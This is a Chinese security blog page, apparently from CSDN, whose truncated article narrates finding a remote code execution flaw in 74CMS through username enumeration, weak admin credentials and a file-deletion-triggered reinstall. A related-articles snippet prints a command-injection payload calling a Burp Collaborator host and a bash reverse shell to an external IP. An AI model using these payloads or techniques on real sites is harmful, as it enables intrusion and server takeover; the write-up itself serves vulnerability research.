74CMS的RCE挖掘思路

最新推荐文章于 2025-10-25 09:53:44 发布
原创 最新推荐文章于 2025-10-25 09:53:44 发布 · 2.9k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全

本文详细介绍了在74CMS中发现远程代码执行(RCE)漏洞的过程,从初探74CMS、后台漏洞挖掘、RCE失败后的思路调整,到最后成功利用任意文件删除漏洞实现RCE。作者通过分析代码,发现并利用了数据库配置文件的可控参数,通过删除特定文件触发应用重装,从而在重新安装过程中注入恶意代码。

0x01 前言

在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~

实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章中DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包中的referer并没有进行过滤,并且将referer中的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include。

思路是referer的内容可以注入的可执行的php文件中。在这个思路下,我就在想能不能也挖掘一个RCE出来,于是有了今天这篇文章。

注:如果想直接了解RCE过程可以直接从4.1开始。

0X01 初探74CMS

进入网站第一眼就看见了登录处。尝试SQL注入后无果,但是这里存在一个遍历用户名的问题:

图片

这个问题就可以想到,他的后台是否也存在变量用户名的问题,访问后台发现确实如此…….

图片

图片

在未设定登陆尝试的次数下可以和轻易的爆破出用户名和密码。

在简单爆破后,就发现了后台的账号密码:

admin/admin

登录后台。

图片

图片

0x02 后台漏洞挖掘

在后台,发现了一处配置网站标题,公司电话的位置,一般这些内容由于需要在前端显示,开发人员会选择存储在服

最低0.47元/天 解锁文章
PbootCms-3.04前台RCE挖掘过程1
08-03
### PbootCms-3.04前台RCE挖掘过程详解 #### 背景介绍 PbootCms是一款开源的内容管理系统(CMS),用于构建网站和管理内容。在其3.04版本中发现了一个远程代码执行(Remote Code Execution, RCE)的安全漏洞。此...
74CMS_v5.0.1后台RCE分析1
08-03
I函数简介获取变量如果要获取的变量类型是 get、post 或 put,可以统一用 param 变量类型,param 变量类型是框架特有的支持自动判断当前请求类
黑盒挖掘rce思路
goddemon
11-11 928
黑盒常见的几个点 1.文件上传 filename处这些 2.邮箱 3.存在域名的地方 典型使用的payload path拼接 1.常规拼接思路 | ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net | 2.直接反弹shell方法,编码的反弹shell思路 | bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 | tes.txt || echo YmFzaCAtaS
RCE远程命令执行漏洞挖掘思路
gududeajun的博客
09-01 4485
RCE漏洞存在的地方包括:在url参数上,文件下载处,在查看图片,查看文件等地方在文件删除上,SSRF可能存在的地方,变量参数提交的地方等
开源 CMS 安全加固实战:Discuz! 漏洞挖掘与修复
最新发布
xx16755498986的博客
10-25 963
开源 CMS 安全加固实战:Discuz! 漏洞挖掘与修复 本文以国内流行开源论坛系统 Discuz! X3.4 为例,通过"环境搭建-漏洞挖掘-分层修复"的实战流程,揭示了配置文件写入代码执行、SQL注入和后台文件读取三大高危漏洞的挖掘与修复方法。文章首先介绍了基于phpStudy的测试环境快速搭建方案,然后详细演示了漏洞复现过程,包括利用安装文件未删除漏洞获取webshell、通过faq.php注入获取管理员密码等。针对这些漏洞,提出了代码级修复、配置级加固和运维级管控的三层防护体系
记一次曲折的RCE挖掘过程
一个安全研究员
09-10 1815
????
74cms
记录笔记
04-11 661
将这个74cms的upload目录设置为网站根目录,使用目录扫描工具进行扫描,然后使用burpsuite对后台地址用户名和密码进行爆破。 外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vz7TMzdB-1649678567118)(![https://img-blog.csdnimg.cn/fa8e0f36afe149218e3c1549728fe6f1.png)] 爆出来用户名admin 密码root ...
"74CMS_v5.0.1 后台 RCE 漏洞分析及利用条件简介
但是在漏洞的挖掘思路以及利用过程中,我们发现了一些独特的思路和技术,通过这些技术最终实现了RCE,因此该漏洞的分析对于我们来说具有一定的启示意义。 首先我们来简单介绍一下74CMS_v5.0.1中的一个重要函数——I...
PbootCms-3.04前台RCE漏洞挖掘与代码解析
PbootCms-3.04前台RCE挖掘过程是一个关于发现并利用PbootCms V3.04版本中的安全漏洞的过程,作者在文章中分享了对这个开源内容管理系统(CMS)的审计经验。在该版本中,存在一个关键漏洞,即当后台配置值被设置为...
记某cms的漏洞挖掘之旅
蚁景网安学院
03-17 752
‍‍原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不...
74CMS 5.0.1后台RCE复现过程
weixin_45821250的博客
12-12 2816
74CMS 5.0.1后台getshell(CVE-2020-35339)复现过程
74cms 4.2.3模板
07-08
74cms4.2.3模板,大家测试用,如果其他需要,可以更贴留言,共同讨论研究
74cms 二次开发文档
08-22
74cms二次开发文档,74 smarty自定义函数,模板使用方法
RCE漏洞挖掘经验分享(一)
记录并分享学习安全的知识点..
01-21 2755
一、RCE漏洞概述 RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 产生的原因:服务器没有对执行命令的函数做严格的过滤,最终导致命令被执行。 二、命令执行函数 1.PHP代码执行函数: eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等
e7xue.php漏洞_Laravel5.7反序列化漏洞之RCE挖掘
weixin_39821035的博客
12-21 371
在前一阵的 2019强网杯线下赛 中,出现一道 Laravel5.7 RCE 漏洞的利用。之前有关注过这个漏洞,但没细究。比赛期间,原漏洞作者删除了详细的分析文章,故想自己挖掘这个漏洞利用链。本文将详细记录 Laravel5.7 反序列化漏洞RCE链 的挖掘过程。漏洞环境直接使用 composer 安装 laravel5.7 框架,并通过 php artisan serve 命令启动 Web 服务...
74CMS人才系统 CVE-2024-2561 RCE复现
mashiro_hibiki的博客
03-21 1406
将poc贴入修改登录的Cookie信息和Token。app="骑士-74CMS"需要先会员注册,注册为招聘者。
32-1 命令执行漏洞 - RCE挖掘与防范
weixin_43263566的博客
03-29 319
这里也找不到在线的,不过可以用bp编码。编码后的字符要使用就需要解密才行。如将 whoami 命令进行编码。这个我没找到编码工具。
《WEB安全渗透测试》(30)RCE漏洞挖掘技巧
午夜安全
09-14 1913
我们安全工程师最喜欢的漏洞是什么?非RCE漏洞莫属!那RCE漏洞挖掘是否有技巧可言?
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值